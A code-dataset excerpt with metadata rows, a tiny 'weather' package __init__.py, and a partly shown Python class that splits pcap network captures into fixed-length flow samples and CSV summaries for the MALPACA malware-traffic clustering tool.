| 36.759305 | 92 | 0.617141 | 5,072 | 44,442 | 5.144716 | 0.054811 | 0.035257 | 0.038323 | 0.019391 | 0.87637 | 0.83981 | 0.826703 | 0.818349 | 0.810416 | 0.804399 | 0 | 0.003767 | 0.277215 | 44,442 | 1,208 | 93 | 36.789735 | 0.808574 | 0.034224 | 0 | 0.798514 | 0 | 0.009285 | 0.118263 | 0.003103 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054782 | false | 0.001857 | 0.02507 | 0.003714 | 0.100279 | 0.020427 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
279f0863b88b2c765c55e311ec337762078a47d5 | 93 | py | Python | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | [
"MIT"
] | null | null | null | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | [
"MIT"
] | null | null | null | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | [
"MIT"
] | null | null | null | from weather import WeatherDay
from weather import WeatherMonth
from weather import __main__
| 23.25 | 32 | 0.870968 | 12 | 93 | 6.416667 | 0.5 | 0.428571 | 0.662338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 93 | 3 | 33 | 31 | 0.950617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
27bac5a1a991c60b13bc850aad5a8dbe9d1c7dcb | 52,064 | py | Python | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | [
"MIT"
] | null | null | null | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | [
"MIT"
] | null | null | null | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | [
"MIT"
] | null | null | null | import csv
import glob
import math
import os
import socket
import sys
from random import random, seed
from timeit import default_timer as timer
import time
from statistics import mean
from pathlib import Path
import networkx as nx
import numpy as np
from scapy.layers.inet import IP, UDP
from scapy.utils import PcapWriter, PcapReader
import tkinter as tk
from tkinter import filedialog
import zat
from zat.log_to_dataframe import LogToDataFrame
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from matplotlib.pyplot import cm
import matplotlib.transforms as mtrans
class For_Malpaca_Preparation_Netflow():
@staticmethod
def get_data_equal_to_fixed_threshold_for_malpaca_enriched(threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
src_ip = str(src_ip.strip())
dst_ip = str(dst_ip.strip())
ip_protocol = str(ip_protocol.strip())
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_skip_x_then_take_fixed_threshold_for_malpaca_enriched(skip, threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
skip = int(skip)
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + str(threshold) + "_fixed_threshold_" + str(skip) + "_skip"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if (index > skip):
if (index <= (skip + threshold)):
pktdump.write(packet)
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if (index > skip):
if (index <= (skip + threshold)):
pktdump.write(packet)
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_skip_x_then_take_fixed_threshold_from_end_for_malpaca_enriched(skip, threshold,
folder_to_filtered_files,
folder_to_move_data_to,
old_file_addition):
skip = int(skip)
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold_" + str(
skip) + "_skip_from_end"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = (threshold + skip) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = (threshold + skip) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_equal_to_fixed_threshold_from_end_for_malpaca_enriched(threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
threshold = threshold
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold_from_end"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = int(threshold) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = int(threshold) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_equal_to_fixed_window_size_for_malpaca(folder_to_filtered_files, folder_to_move_data_to, window_size, old_file_addition):
window_size = window_size
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(window_size)) + "_window_size"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
window_dic = {}
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount_packets = len(packets_value)
if amount_packets >= window_size:
amount_windows = (math.floor(amount_packets / window_size))
amount_packets = amount_windows * window_size
window_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = amount_windows
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < amount_packets:
pktdump.write(packet)
else:
break
pktdump.close()
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
